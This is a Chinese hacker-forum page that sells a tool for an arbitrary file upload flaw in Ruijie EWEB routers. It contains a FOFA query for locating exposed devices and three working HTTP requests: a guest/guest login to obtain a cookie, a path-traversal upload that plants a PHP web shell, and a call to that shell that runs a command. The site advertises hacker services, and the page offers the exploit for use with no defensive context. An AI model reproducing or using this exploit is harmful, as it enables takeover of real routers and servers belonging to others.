锐捷EWEB路由器 任意文件上传漏洞-附工具

锐捷EWEB路由器 任意文件上传漏洞-附工具-HackBug是一个专注于网络安全-渗透测试-漏洞挖掘-暗网黑客论坛-中国黑客论坛-黑客技术-黑客团队-黑客业务-TT科技-TT黑客-TT语音-黑客服务的综合平台。
锐捷EWEB路由器 任意文件上传漏洞-附工具
此内容为付费资源,请付费后查看
1
暂时无法购买,请与站长联系
您当前未登录!建议登陆后购买,可保存购买订单
付费资源

# 一、漏洞概述 

锐捷EWEB路由器 timeout.php 接口存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

# 二、资产测绘

FOFA:

title="锐捷网络-EWEB网管系统"

20645f60b220260112164527

# 三、漏洞复现

1、获取可用cookie
POST /ddi/server/login.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=guest&password=guest?

981329cb9920260112164922

2、利用可用cookie进行文件上传
POST /system_pi/timeout.php?a=upload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Content-Length: 76
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=vl6ib1m7o5jjb1fpr003vfajd2
Accept-Encoding: gzip
fileName=../tmp/html/r1eltm.php&mes=<?php system($_GET['cmd']); ?>

467261abe720260112165001

3、访问上传文件
GET /r1eltm.php?cmd=id HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Cookie: RUIJIEID=vl6ib1m7o5jjb1fpr003vfajd2
Accept-Encoding: gzip

e466cb755120260112165048

 

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容

付费资源
1
暂时无法购买,请与站长联系
您当前未登录!建议登陆后购买,可保存购买订单